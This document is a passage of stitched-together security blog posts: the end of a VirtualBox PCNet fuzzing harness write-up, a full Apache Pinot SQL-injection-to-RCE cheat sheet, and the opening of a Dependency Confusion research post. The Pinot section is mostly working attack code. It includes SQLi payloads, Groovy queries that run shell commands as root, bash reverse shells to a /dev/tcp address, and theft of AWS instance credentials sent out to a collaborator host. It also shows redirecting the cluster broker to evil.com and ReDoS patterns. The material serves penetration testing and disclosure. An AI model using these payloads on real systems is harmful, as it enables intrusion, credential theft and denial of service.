        u32 = pfdp->ConsumeIntegral<uint32_t>();
        cb = pfdp->PickValueInArray(Array);

        switch (choice) {
            case 0:
                // pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 1:
                // pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 2:
                // pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
                //   RTGCPHYS off, void const *pv, unsigned cb)
                pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
                break;
            default:
                break;
        }

    }
    __AFL_COVERAGE_OFF();

    pThis->fdp = NULL;
    return VINF_SUCCESS;
}

Fuzzing PDMDevHlpPhysRead

As the device driver calls this function multiple times, we decided to patch the wrapper instead of modifying every instance. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead method to fuzz only the specific driver.

#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"

#include <fuzzer/FuzzedDataProvider.h> /* Add this */

// [ SNIP ]

/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
    PDMDEV_ASSERT_DEVINS(pDevIns);
    PVM pVM = pDevIns->Internal.s.pVMR3;
    LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
             pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));

    /* Change this for the fuzzed driver */
    if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
        FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
        if (pfdp && pfdp->remaining_bytes() >= cbRead) {
            pfdp->ConsumeData(pvBuf, cbRead);
            return VINF_SUCCESS;
        }
    }

Using out/linux.amd64/release/bin/VBoxNetAdpCtl, we can add our network adapter and start fuzzing in persistent mode. However, even though we can reach more than 10k executions per second, we still have some work to do regarding stability.

Improving Stability

Unfortunately, none of the methods described here worked, as we were not able to use LTO instrumentation. We guess that’s because the device drivers module is dynamically loaded, so partially disabling instrumentation was not possible, nor was it possible to identify unstable edges. The instability is caused by not properly resetting the driver’s state, and because we are running the whole VM, there are many things under the hood which are not easy to influence, such as internal locks or the VMM.

One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.

Additionally, we can disable the instantiation of all devices which we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp, implementing the init completion routine through pdmR3DevInit. For the PCNet driver, at least the pci, VMMDev, and pcnet modules must be enabled. Therefore, we can skip the initialization for the rest.

    /*
     *
     * Instantiate the devices.
     *
     */
    for (i = 0; i < cDevs; i++)
    {
        PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;

        // if (!strcmp(pReg->szName, "pci")) {continue;}
        if (!strcmp(pReg->szName, "ich9pci")) {continue;}
        if (!strcmp(pReg->szName, "pcarch")) {continue;}
        if (!strcmp(pReg->szName, "pcbios")) {continue;}
        if (!strcmp(pReg->szName, "ioapic")) {continue;}
        if (!strcmp(pReg->szName, "pckbd")) {continue;}
        if (!strcmp(pReg->szName, "piix3ide")) {continue;}
        if (!strcmp(pReg->szName, "i8254")) {continue;}
        if (!strcmp(pReg->szName, "i8259")) {continue;}
        if (!strcmp(pReg->szName, "hpet")) {continue;}
        if (!strcmp(pReg->szName, "smc")) {continue;}
        if (!strcmp(pReg->szName, "flash")) {continue;}
        if (!strcmp(pReg->szName, "efi")) {continue;}
        if (!strcmp(pReg->szName, "mc146818")) {continue;}
        if (!strcmp(pReg->szName, "vga")) {continue;}
        // if (!strcmp(pReg->szName, "VMMDev")) {continue;}
        // if (!strcmp(pReg->szName, "pcnet")) {continue;}
        if (!strcmp(pReg->szName, "e1000")) {continue;}
        if (!strcmp(pReg->szName, "virtio-net")) {continue;}
        // if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
        if (!strcmp(pReg->szName, "ichac97")) {continue;}
        if (!strcmp(pReg->szName, "sb16")) {continue;}
        if (!strcmp(pReg->szName, "hda")) {continue;}
        if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
        if (!strcmp(pReg->szName, "acpi")) {continue;}
        if (!strcmp(pReg->szName, "8237A")) {continue;}
        if (!strcmp(pReg->szName, "i82078")) {continue;}
        if (!strcmp(pReg->szName, "serial")) {continue;}
        if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
        if (!strcmp(pReg->szName, "parallel")) {continue;}
        if (!strcmp(pReg->szName, "ahci")) {continue;}
        if (!strcmp(pReg->szName, "buslogic")) {continue;}
        if (!strcmp(pReg->szName, "pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
        if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
        if (!strcmp(pReg->szName, "GIMDev")) {continue;}
        if (!strcmp(pReg->szName, "lpc")) {continue;}

       /*
         * Gather a bit of config.
         */
        /* trusted */

The most significant issue is that minimizing our test cases is not an option when the stability is low (the percentage depends on the drivers we fuzz). If we cannot reproduce the crash, we can at least intercept it and analyze it afterward in gdb.

We ran AFL in debug mode as a workaround, which yields a core file after every crash. Before running the fuzzer, this behavior can be enabled by:

$ export AFL_DEBUG=1
$ ulimit -c unlimited

Conclusion

We presented one of the possible approaches to fuzzing VirtualBox device drivers. We hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with the quote from doc/VBox-CodingGuidelines.cpp:

 * (2)  "A really advanced hacker comes to understand the true inner workings of
 *      the machine - he sees through the language he's working in and glimpses
 *      the secret functioning of the binary code - becomes a Ba'al Shem of
 *      sorts."   (Neal Stephenson "Snow Crash")

References

Apache Pinot SQLi and RCE Cheat Sheet

8 June 2022 at 22:00

The database platform Apache Pinot has been growing in popularity. Let’s attack it!

This article will help pentesters use their familiarity with classic database systems such as Postgres and MariaDB, and apply it to Pinot. In this post, we will show how a classic SQL-injection (SQLi) bug in a Pinot-backed API can be escalated to Remote Code Execution (RCE) and then discuss post-exploitation.

What Is Pinot?

Pinot is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics, even at extremely high throughput.

Huh? If it helps, most articles try to explain OLAP (OnLine Analytical Processing) by showing a diagram of your 2D database table turning into a cube, but for our purposes we can ignore all the jargon.

Apache Pinot is a database system which is tuned for analytics queries (Business Intelligence) where:

  • data is being streamed in, and needs to be instantly queryable
  • many users need to perform complicated queries at the same time
  • the queries need to quickly aggregate or filter terabytes of data

Apache Pinot Overview

Pinot was started in 2013 at LinkedIn, where it now

powers some of LinkedIn’s more recognisable experiences such as Who Viewed My Profile, Job, Publisher Analytics, […] Pinot also powers LinkedIn’s internal reporting platform…

Pinot is unlikely to be used for storing a fairly static table of user emails and password hashes. It is more likely to be found ingesting a stream of orders or user actions from Kafka for analysis via an internal dashboard. Takeaway delivery platform UberEats gives all restaurants access to a Pinot-powered dashboard which

enables the owner of a restaurant to get insights from Uber Eats orders regarding customer satisfaction, popular menu items, sales, and service quality analysis. Pinot enables slicing and dicing the raw data in different ways and supports low latency queries…

Essential Architectural Details

Pinot is written in Java.

Table data is partitioned / sharded into Segments, usually split based on timestamp, which can be stored in different places.

Apache Pinot is a cluster formed of different components, the essential ones being Controllers, Servers and Brokers.

Server

The Server stores segments of data. It receives SQL queries via GRPC, executes them and returns the results.

Broker

The Broker has an exposed HTTP port which clients send queries to. The Broker analyses the query and queries the Servers which have the required segments of data via GRPC. The client receives the results consolidated into a single response.

Controller

Maintains cluster metadata and manages other components. It serves admin endpoints and endpoints for uploading data.

Zookeeper

Apache Zookeeper is used to store cluster state and metadata. There may be multiple brokers, servers and controllers (LinkedIn claims to have more than 1000 nodes in a cluster), so Zookeeper is used to keep track of these nodes and which servers host which segments. Essentially it’s a hierarchical key-value store.

Setting Up a Test Environment

Following the Kubernetes quickstart in Minikube is an easy way to create a multi-node environment. The documentation walks through the steps to install the Pinot Helm chart, set up ingestion via Kafka, and expose port 9000 of the Controller to access the query editor and cluster management UI. If things break horrifically, you can just minikube delete to wipe everything and start again.

The only recommendations are to:

  • Set image.tag in kubernetes/helm/pinot/values.yaml to a specific Pinot release (e.g. release-0.10.0) rather than latest to test a specific version.
  • Install the Pinot chart from ./kubernetes/helm/pinot to use your local configuration changes rather than pinot/pinot which fetches values from the Github master branch.
  • Use stern -n pinot-quickstart pinot to tail logs from all nodes.

Pinot SQL Syntax & Injection Basics

While Pinot syntax is based on Apache Calcite, many features in the Calcite reference are unsupported in Pinot. Here are some useful language features which may help to identify and test a Pinot backend.

Strings

Strings are surrounded by single-quotes. Single-quotes can be escaped with another single-quote. Double quotes denote identifiers e.g. column names.

String concatenation

Performed by the 3-parameter function CONCAT(str1, str2, separator). The + sign only works with numbers.

SELECT "someColumn", 'a ''string'' with quotes', CONCAT('abc','efg','d') FROM myTable

Substrings

SUBSTR(col, startIndex, endIndex) where indexes start at 0 and can be negative to count from the end. This is different from Postgres and MySQL where the last parameter is a length.

SELECT SUBSTR('abcdef', -3, -1) FROM ignoreMe -- 'def'

Length

LENGTH(str)

Comments

Line comments -- do not require surrounding whitespace. Multiline comments /* */ raise an error if the closing */ is missing.

Filters

Basic WHERE filters need to reference a column. Filters which do not operate on any column will raise errors, so SQLi payloads such as ' OR ''=' will fail:

SELECT * FROM airlineStatsAvro
WHERE 1 = 1
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 1 should not be null.
-- Potentially invalid column name specified.
SELECT * FROM airlineStatsAvro
WHERE year(NOW()) > 0
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 2022 should not be null.
-- Potentially invalid column name specified.

As long as you know a valid column name, you can still return all records e.g.:

SELECT * FROM airlineStatsAvro
WHERE 0 = Year - Year AND ArrTimeBlk != 'blahblah-bc'

BETWEEN

SELECT * FROM transcript WHERE studentID between 201 and 300

IN

Use col IN (literal1, literal2, ...).

SELECT * FROM transcript WHERE UPPER(firstName) IN ('NICK','LUCY')

String Matching

In LIKE filters, % and _ are converted to regular expression patterns .* and .

The REGEXP_LIKE(col, regex) function uses a java.util.regex.Pattern case-insensitive regular expression.

WHERE REGEXP_LIKE(alphabet, '^a[Bcd]+.*z$')

Both methods are vulnerable to Denial of Service (DoS) if users can provide their own unsanitised search queries e.g.:

  • LIKE '%%%%%%%%%%%%%zz'
  • REGEXP_LIKE(col, '((((((.*)*)*)*)*)*)*zz')

These filters will run on the Pinot server at close to 100% CPU forever (OK, for a very very long time depending on the data in the column).

UNION

No.

Stacked / Batched Queries

Nope.

JOIN

Limited support for joins is in development. Currently it is possible to join against offline tables using the lookUp function.

Subqueries

Limited support. The subquery is supposed to return a base64-encoded IdSet. An IdSet is a data structure (compressed bitmap or Bloom filter) where it is very fast to check if an Id belongs in the IdSet. The IN_SUBQUERY (filtered on Broker) or IN_PARTITIONED_SUBQUERY (filtered on Server) functions perform the subquery and then use this IdSet to filter results from the main query.

WHERE IN_SUBQUERY(
  yearID,
  'SELECT ID_SET(yearID) FROM baseballStats WHERE teamID = ''BC'''
  ) = 1

Database Version

It is common to SELECT @@VERSION or SELECT VERSION() when fingerprinting database servers. Pinot lacks this feature. Instead, the presence or absence of functions and other language features must be used to identify a Pinot server version.

Information Schema Tables

No.

Data Types

Some Pinot functions are sensitive to the column types in use (INT, LONG, BYTES, STRING, FLOAT, DOUBLE). The hash functions like SHA512, for instance, will only operate on BYTES columns and not STRING columns. Luckily, we can find the undocumented toUtf8 function in the source code and convert strings into bytes:

SELECT md5(toUtf8(somestring)) FROM table

CASE

Simple case:

SELECT
  CASE firstName WHEN 'Lucy' THEN 1 WHEN 'Bob', 'Nick' THEN 2 ELSE 'x' END
FROM transcript

Searched case:

SELECT
  CASE WHEN firstName = 'Lucy' THEN 1 WHEN firstName = 'Bob' THEN 2.1 ELSE 'x' END
FROM transcript

Query Options

Certain query options such as timeouts can be added with OPTION(key=value,key2=value2). Strangely enough, this can be added anywhere inside the query, and I mean anywhere!

SELECT studentID, firstOPTION(timeoutMs=1)Name
froOPTION(timeoutMs=1)m tranOPTION(timeoutMs=2)script
WHERE firstName OPTION(timeoutMs=1000) = 'Lucy'
-- succeeds as the final timeoutMs is long (1000ms)

SELECT * FROM transcript WHERE REGEXP_LIKE(firstName, 'LuOPTION(timeoutMs=1)cy')
-- BrokerTimeoutError:
-- Query timed out (time spent: 4ms, timeout: 1ms) for table: transcript_OFFLINE before scattering the request
--
-- With timeout 10ms, the error is:
-- 427: 1 servers [pinot-server-0_O] not responded
--
-- With an even larger timeout value the query succeeds and returns results for 'Lucy'.

Yes, even inside strings!

In a Pinot-backed search API, queries for thingumajig and thinguOPTION(a=b)majig should return identical results, assuming the characters ()= are not filtered by the API.

This is also potentially a useful WAF bypass.

They're the same picture meme

CTF-grade SQL injection

In far-fetched scenarios, this could be used to comment out parts of a SQL query, e.g. a route /getFiles?category=)&title=%25oPtIoN( using a prepared statement to produce the SQL:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%oPtIoN('
  and topSecret = false
  and category LIKE ')'

Everything between OPTION( and the next ) is stripped out using regex /option\s*\([^)]+\)/i. The query gets executed as:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%'

allowing access to all the top secret files!

Note that the error "OPTION statement requires two parts separated by '='" occurs if there is the wrong number of equals signs inside the OPTION().

Another contrived scenario could result in SQLi and a filter bypass.

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, 'oPtIoN(a=b')
  and not topSecret
  and category = ') OR id - id = 0--'

will be processed as

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, '
  and not topSecret
  and category = ') OR id - id = 0

Timeouts

Timeouts do not work. While the Broker returns a timeout exception to the client when the query timeout is reached, the Server continues processing the query row by row until completion, however long that takes. There is no way to cancel an in-progress query besides killing the Server process.

SQL Injection in Pinot

To proceed, you’ll need a SQL injection vulnerability, just as with any other type of database backend: malicious user input must wind up in the query body rather than being sent as parameters with prepared statements.

Pinot backends do not support prepared statements, but the Java client has a PreparedStatement class which escapes single quotes before sending the request to the Broker and can prevent SQLi (except the OPTION() variety).
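
As a rough Python sketch of the same idea (a hypothetical helper, not an official client API), doubling single quotes keeps a payload inert inside a string literal, although it does nothing against the OPTION() trick described earlier:

def pinot_quote(value):
    """Escape a string for interpolation into a Pinot string literal.

    Mirrors what the Java client's PreparedStatement does: single quotes are doubled.
    """
    return value.replace("'", "''")

print(pinot_quote("!xyz') OR store_id - store_id = 0--"))
# !xyz'') OR store_id - store_id = 0--   -> stays inside the '...' literal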

Injection may appear in a search query such as:

query = """SELECT order_id, order_details_json FROM orders
WHERE store_id IN ({stores})
  AND REGEXP_LIKE(product_name,'{query}')
  AND refunded = false""".format(
    stores=user.stores,
    query=request.query,
)

The query parameter can be abused for SQL injection to return all orders in the system without the restriction to specific store IDs. An example payload is !xyz') OR store_id - store_id = 0 OR (product_name = 'abc! which will produce the following SQL query:

SELECT order_id, order_details_json FROM orders
WHERE store_id IN (12, 34, 56)
  AND REGEXP_LIKE(product_name,'!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!')
  AND refunded = false

The logical split happens on the OR, so records will be returned if either:

  • store_id IN (12, 34, 56) AND REGEXP_LIKE(product_name,'!xyz') (unlikely to have any results)
  • store_id - store_id = 0 (always true, so all records are returned)
  • (product_name = 'abc!') AND refunded = false (unlikely to have any results)

If the query template used by the target has no new lines, the query can alternatively be ended with a line comment !xyz') OR store_id - store_id = 0--.

RCE via Groovy

While maturity is bringing improvements, secure design has not always been a priority. Pinot trusts anyone who can query the database to also execute code on the Server, as root 😲. This feature (a gaping security hole, really) is enabled by default in all released versions of Apache Pinot. It was disabled by default in a commit on May 17, 2022, but this commit has not yet made it into a release.

Scripts are written in the Groovy language. This is a JVM-based language, allowing you to use all your favourite Java methods. Here’s some Groovy syntax you might care about:

// print to Server log (only going to be useful when testing locally)
println 3
// make a variable
def data = 'abc'
// interpolation by using double quotes and $ARG or ${ARG}
def moredata = "${data}def"  // abcdef
// execute shell command, wait for completion and then return stdout
'whoami'.execute().text
// launch shell command, but do not wait for completion
"touch /tmp/$arg0".execute()
// execute shell command with array syntax, helps avoid quote-escaping hell
["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/53 0>&1 &"].execute()
// a semicolon must be placed after the final closing bracket of an if-else block
if (true) { a() } else { b() }; return "a"

To execute Groovy, use:

GROOVY(
  '{"returnType":"INT or STRING or some other data type","isSingleValue":true}',
  'groovy code on one line',
  MaybeAColumnName,
  MaybeAnotherColumnName
)

If columns (or transform functions) are specified after the groovy code, they appear as variables arg0, arg1, etc. in the Groovy script.

RCE Example Queries

Whoami

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "whoami".execute().text; return 1'
) = 1 limit 5

Prints root to the log! The official Pinot docker images run Groovy scripts as root.

Note that:

  1. The Groovy function is an exception to the earlier rule requiring filters to include a column name.
  2. Even though the limit is 5, every row in each segment being searched is processed. Once 5 rows are reached, the query returns results to the Broker, but the root lines continue being printed to the log.
  3. The return and comparison values need not be the same. However the types must match returnType in the metadata JSON (here INT).
  4. The return keyword is optional for the final statement, so the script could end with ; 1.

The following example passes a column to the Groovy script:
SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "hello $arg0"; "touch /tmp/id-$arg0".execute(); 42',
  id
) = 3

In /tmp, expect root-owned files id-1, id-2, id-3, etc. for each row.

AWS

Steal temporary AWS IAM credentials from pinot-server.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/";',
    'def collab = "xyz.burpcollaborator.net/";',
''),'def role = "curl -s ${aws}".execute().text.split("\n")[0].trim();',
''),'def creds = "curl -s ${aws}${role}".execute().text;',
''),'["curl", collab, "--data", creds].execute(); 0',
  '')
) = 1

This could give access to cloud resources like S3. The code can of course be adapted to work with IMDSv2.

Reverse Shell

The goal is really to have a root shell from which to explore the cluster at your leisure without your commands appearing in query logs. You can use the following:

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1 &"].execute(); return 1'
) = 1

to spawn loads of reverse shells at the same time, one per row.

root@pinot-server-1:/opt/pinot#

You will be root on whichever Server instances are chosen by the broker based on which Servers contain the required table segments for the query.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"STRING","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute().text'
) = 'x'

This launches one reverse shell. If you accidentally kill the shell, however far into the future, a new reverse shell attempt will be spawned as the Server processes the next row. Yes, the client and Broker will see the query timeout, but the Server will continue executing the query until completion.

Tuning

When coming across Pinot for the first time on an engagement, we used a Groovy query similar to the AWS one above. However, as you can already guess, this launched tens of thousands of requests at Burp Collaborator over a span of several hours with no way to stop the runaway query besides confessing our sin to the client.

To avoid spawning thousands of processes and causing performance degradation and potentially a Denial of Service, limit execution to a single row with an if statement in Groovy.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'if (arg0 == "489") {',
    '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute();',
''),'return 1;',
''),'};',
''),'return 0',
  ''),
  id
) = 1

A reverse shell is spawned only for the one row with id 489.

Use RCE on Server to Attack Other Nodes

We have root access to a Server via our reverse shell, giving us access to:

  • All the segment data stored on the Server
  • Configuration and environment variables with the locations of other services such as Broker and Zookeeper
  • Potentially keys to the cloud environment with juicy IAM permissions

As we’re root here already, let’s try to use our foothold to affect other parts of the Pinot cluster such as Zookeeper, Brokers, Controllers, and other Servers.

First we should check the configuration.

root@pinot-server-1:/opt/pinot# cat /proc/1/cmdline | sed 's/\x00/ /g'
/usr/local/openjdk-11/bin/java -Xms512M ... -Xlog:gc*:file=/opt/pinot/gc-pinot-server.log -Dlog4j2.configurationFile=/opt/pinot/conf/log4j2.xml -Dplugins.dir=/opt/pinot/plugins -Dplugins.dir=/opt/pinot/plugins -classpath /opt/pinot/lib/*:...:/opt/pinot/plugins/pinot-file-system/pinot-s3/pinot-s3-0.10.0-SNAPSHOT-shaded.jar -Dapp.name=pinot-admin -Dapp.pid=1 -Dapp.repo=/opt/pinot/lib -Dapp.home=/opt/pinot -Dbasedir=/opt/pinot org.apache.pinot.tools.admin.PinotAdministrator StartServer -clusterName pinot -zkAddress pinot-zookeeper:2181 -configFileName /var/pinot/server/config/pinot-server.conf

We have a Zookeeper address -zkAddress pinot-zookeeper:2181 and config file location -configFileName /var/pinot/server/config/pinot-server.conf. The file contains data locations and auth tokens in the unlikely event that internal cluster authentication has been enabled.

Zookeeper

It is likely that the locations of other services are available as environment variables; however, the source of truth is Zookeeper. Nodes must be able to read and write to Zookeeper to update their status.

root@pinot-server-1:/opt/pinot# cd /tmp
root@pinot-server-1:/tmp# wget -q https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz && tar xzf apache-zookeeper-3.8.0-bin.tar.gz
root@pinot-server-1:/tmp# ./apache-zookeeper-3.8.0-bin/bin/zkCli.sh -server pinot-zookeeper:2181
Connecting to pinot-zookeeper:2181
...
2022-06-06 20:53:52,385 [myid:pinot-zookeeper:2181] - INFO  [main-SendThread(pinot-zookeeper:2181):o.a.z.ClientCnxn$SendThread@1444] - Session establishment complete on server pinot-zookeeper/10.103.140.149:2181, session id = 0x10000046bac0016, negotiated timeout = 30000
...
[zk: pinot-zookeeper:2181(CONNECTED) 0] ls /pinot/CONFIGS/PARTICIPANT
[Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099, Controller_pinot-controller-0.pinot-controller-headless.pinot-quickstart.svc.cluster.local_9000, Minion_pinot-minion-0.pinot-minion-headless.pinot-quickstart.svc.cluster.local_9514, Server_pinot-server-0.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098, Server_pinot-server-1.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098]

Now we have the list of “participants” in our Pinot cluster. We can get the configuration of a Broker:

[zk: pinot-zookeeper:2181(CONNECTED) 1] get /pinot/CONFIGS/PARTICIPANT/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099
{
  "id" : "Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099",
  "simpleFields" : {
    "HELIX_ENABLED" : "true",
    "HELIX_ENABLED_TIMESTAMP" : "1654547467392",
    "HELIX_HOST" : "pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local",
    "HELIX_PORT" : "8099"
  },
  "mapFields" : { },
  "listFields" : {
    "TAG_LIST" : [ "DefaultTenant_BROKER" ]
  }
}

By modifying the broker HELIX_HOST in Zookeeper (using set), Pinot queries will be sent via HTTP POST to /query/sql on a machine you control rather than the real broker. You can then reply with your own results. While powerful, this is a rather disruptive attack.

As a further mitigating factor, it will not affect services which send requests directly to a hardcoded Broker address. Many clients do rely on Zookeeper or the Controller to locate the broker, though, and these clients will be affected. We have not investigated whether intra-cluster mutual TLS would downgrade this attack to DoS.

Broker

We discovered the location of the broker. Its HELIX_PORT refers to an HTTP server used for submitting SQL queries:

curl -H "Content-Type: application/json" -X POST \
   -d '{"sql":"SELECT X FROM Y"}' \
   http://pinot-broker-0:8099/query/sql

Sending queries directly to the broker may be much easier than via the SQLi endpoint. Note that the broker may have basic auth enabled, but as with all Pinot services it is disabled by default.

All Pinot REST services also have an /appconfigs endpoint returning configuration, environment variables and java versions.
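
For example, reusing the broker address from the query example above:

curl http://pinot-broker-0:8099/appconfigs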

Other Servers

There may be data which is only present on other Servers. From your reverse shell, SQL queries can be sent to any other Server via gRPC without requiring authentication.

Alternatively, we can go back and use Pinot’s IdSet subquery functionality to get shells on other Servers. We do this by injecting an IN_SUBQUERY(columnName, subQuery) filter into our original query to tableA to produce SQL like:

SELECT * FROM tableA
  WHERE
    IN_SUBQUERY(
      'x',
      'SELECT ID_SET(firstName) FROM tableB WHERE groovy(''{"returnType":"INT","isSingleValue":true}'',''println "RCE";return 3'', studentID)=3'
    ) = true

It is important that the tableA column name (here the literal 'x') and the ID_SET column of the subquery have the same type. If an integer column from tableB is used instead of firstName, the 'x' must be replaced with an integer.

We now get RCE on the Servers holding segments of tableB.

Controller

The Controller also has a useful REST API.

It has methods for getting and setting data such as cluster configuration, table schemas, instance information and segment data.

It can be used to interact with Zookeeper, e.g., to update the broker host as was done directly via Zookeeper above.

curl -X PUT "http://localhost:9000/instances/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099?updateBrokerResource=true" -H  "accept: application/json" -H  "Content-Type: application/json" -d "{  \"instanceName\": \"Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099\",  \"host\": \"evil.com\",  \"enabled\": true,  \"port\": \"8099\",  \"tags\": [\"DefaultTenant_BROKER\"],  \"type\":\"BROKER\",  \"pools\": null,  \"grpcPort\": -1,  \"adminPort\": -1,  \"systemResourceInfo\": null}"

Files can also be uploaded for ingestion into tables.

TLDR

  • Pinot is a modern database platform that can be attacked with old-school SQLi
  • SQL injection leads to Remote Code Execution by default in the latest release, at the time of writing
  • In the official container images, RCE means root on the Server component of the Pinot cluster
  • From here, other components can be affected to a certain degree
  • WTF is going on with OPTION()?
  • Pinot is under active development. Maturity will bring security improvements
  • In an upcoming release (>0.10.0) the SQLi to RCE footgun will be opt-in

Dependency Confusion

20 July 2022 at 22:00

On Feb 9th, 2022 PortSwigger announced Alex Birsan’s Dependency Confusion as the winner of the Top 10 web hacking techniques of 2021. Over the past year this technique has gained a lot of attention. Despite that, in-depth information about hunting for and mitigating this vulnerability is scarce.

I have always believed the best way to understand something is to get hands-on experience. In the following post, I’ll show the results of my research that focused on creating an all-around tool (named Confuser) to test and exploit potential Dependency Confusion vulnerabilities in the wild. To validate its effectiveness, we looked for potential Dependency Confusion vulnerabilities in top ElectronJS applications on Github (spoiler: it wasn’t a great idea!).

The tool has helped Doyensec during engagements to ensure that our clients are safe from this threat, and we believe it can facilitate testing for researchers and blue-teams too.

So… what is Dependency Confusion?

Dependency confusion is an attack against the build process of the application. It occurs as a result of a misconfiguration of the private dependency repositories. Vulnerable configurations allow downloading versions of local packages from a main public repository (e.g., registry.npmjs.com for NPM). When a private package is registered only in a local repository, an attacker can upload a malicious package to the main repository with the same name and higher version number. When a victim updates their packages, malicious code will be downloaded and executed on a build or developer machine.

Why is it so hard to study Dependency Confusion?

There are multiple reasons why, despite all the attention, Dependency Confusion seems to be so unexplored.

There are plenty of dependency management systems

Each programming language utilizes different package management tools, most with their own repositories. Many languages have multiple of them. JavaScript alone has NPM, Yarn and Bower to name a few. Each tool comes with its own ecosystem of repositories, tools, options for local package hosting (or lack thereof). It is a significant time cost to include another repository system when working with projects utilizing different technology stacks.

In my research I have decided to focus on the NPM ecosystem. The main reason for that is its popularity. It’s a leading package management system for JavaScript and my secondary goal was to test ElectronJS applications for this vulnerability. Focusing on NPM would guarantee coverage on most of the target applications.

Actual exploitation requires interaction with 3rd party services

In order to exploit this vulnerability, the researcher needs to upload a malicious package to a public repository. Rightly so, most of them actively work against such practices. On NPM, malicious packages are flagged and removed along with banning of the owner account.

During the research, I was interested in observing how much time an attacker has before their payload is removed from the repository. Additionally, NPM is not actually a target of the attack, so among my goals was to minimize the impact on the platform itself and its users.

Reliable information extraction from targets is hard

In the case of a successful exploitation, a target machine is often a build machine inside a victim organization’s network. While this is a big part of why the attack is so dangerous, extracting information from such a network is not always an easy task.

In his original research, Alex proposes a DNS extraction technique to exfiltrate information about attacked machines. This is the technique I have decided to use too. It requires a small infrastructure with a custom DNS server, unlike most web exploitation attacks, where often only an HTTP proxy or browser is enough. This highlights why building tools such as mine is essential, if the community is to hunt these bugs reliably.

The tool

So, how to deal with those problems? I have decided to try and create Confuser - a tool that attempts to solve the aforementioned issues.

The tool is OSS and available at https://github.com/doyensec/confuser.

Be respectful and don’t create problems to our friends at NPM!

The process

Researching any Dependency Confusion vulnerability consists of three steps.

Step 1) Reconnaissance

Finding Dependency Confusion bugs requires a package file that contains a list of application dependencies. In case of projects utilizing NPM, the package.json file holds such information:

{
  "name": "Doyensec-Example-Project",
  "version": "1.0.0",
  "description": "This is an example package. It uses two dependencies: one is a public one named axios. The other one is a package hosted in a local repository named doyensec-library.",
  "main": "index.js",
  "author": "Doyensec LLC <[email protected]>",
  "license": "ISC",
  "dependencies": {
    "axios": "^0.25.0",
    "doyensec-local-library": "~1.0.1",
    "another-doyensec-lib": "~2.3.0"
  }
}

When a researcher finds a package.json file, their first task is to identify potentially vulnerable packages. That means packages that are not available in the public repository. The process of verifying the existence of a package seems pretty straightforward. Only one HTTP request is required. If a response status code is anything but 200, the package probably does not exist:

def check_package_exists(package_name):
    response = requests.get(NPM_ADDRESS + "package/" + package_name, allow_redirects=False)

    return (response.status_code == 200)

